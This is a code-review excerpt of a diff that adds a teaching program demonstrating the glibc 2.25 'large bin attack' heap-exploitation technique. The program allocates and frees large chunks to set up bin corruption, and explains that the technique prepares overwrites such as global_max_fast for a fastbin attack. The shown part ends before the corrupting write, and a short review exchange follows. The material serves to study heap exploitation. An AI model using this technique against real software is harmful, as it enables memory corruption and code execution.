glibc_2.25/large_bin_attack.c

```diff
@@ -0,0 +1,104 @@
+/*
+
+    This technique is taken from
+    https://dangokyo.me/2018/04/07/a-revisit-to-large-bin-in-glibc/
+
+    [...]
+
+              else
+              {
+                  victim->fd_nextsize = fwd;
+                  victim->bk_nextsize = fwd->bk_nextsize;
+                  fwd->bk_nextsize = victim;
+                  victim->bk_nextsize->fd_nextsize = victim;
+              }
+              bck = fwd->bk;
+
+    [...]
+
+    mark_bin (av, victim_index);
+    victim->bk = bck;
+    victim->fd = fwd;
+    fwd->bk = victim;
+    bck->fd = victim;
+
+    [...]
+
+ */
+
+#include<stdio.h>
+#include<stdlib.h>
+ 
+int main()
+{
+    fprintf(stderr, "This file demonstrates large bin attack by writing a large unsigned long value into stack\n");
+    fprintf(stderr, "In practice, large bin attack is generally prepared for further attacks, such as rewriting the "
+           "global variable global_max_fast in libc for further fastbin attack\n\n");
+
+    unsigned long stack_var1 = 0;
+    unsigned long stack_var2 = 0;
+
+    fprintf(stderr, "Let's first look at the targets we want to rewrite on stack:\n");
+    fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
+    fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);
+
+    unsigned long *p1 = malloc(0x320);
+    fprintf(stderr, "Now, we allocate the first large chunk on the heap at: %p\n", p1 - 2);
+
+    fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"
+           " the first large chunk during the free()\n\n");
+    malloc(0x20);
+
+    unsigned long *p2 = malloc(0x400);
+    fprintf(stderr, "Then, we allocate the second large chunk on the heap at: %p\n", p2 - 2);
+
+    fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"
+           " the second large chunk during the free()\n\n");
+    malloc(0x20);
+
+    unsigned long *p3 = malloc(0x400);
+    fprintf(stderr, "Finally, we allocate the third large chunk on the heap at: %p\n", p3 - 2);
+ 
+    fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the top chunk with"
+           " the third large chunk during the free()\n\n");
+    malloc(0x20);
+ 
+    free(p1);
+    free(p2);
+    fprintf(stderr, "We free the first and second large chunks now and they will be inserted in the unsorted bin:"
+           " %p --> %p\n\n", (void *)(p2 - 2), (void *)(p1 - 2));
+
+    malloc(0x90);
+    fprintf(stderr, "Now, we allocate a chunk with a size smaller than the freed first large chunk. This will move the"
+            " freed second large chunk into the large bin freelist, use parts of the freed first large chunk for allocation"
+            ", and reinsert the remaining of the freed first large chunk into the unsorted bin:"
+            " %p\n\n", (void *)((char *)p1 + 0x90));
+
```

Comment:
Please add a message that you free the third chunk here

Reply:
I'll take care of it. Thanks for catching it.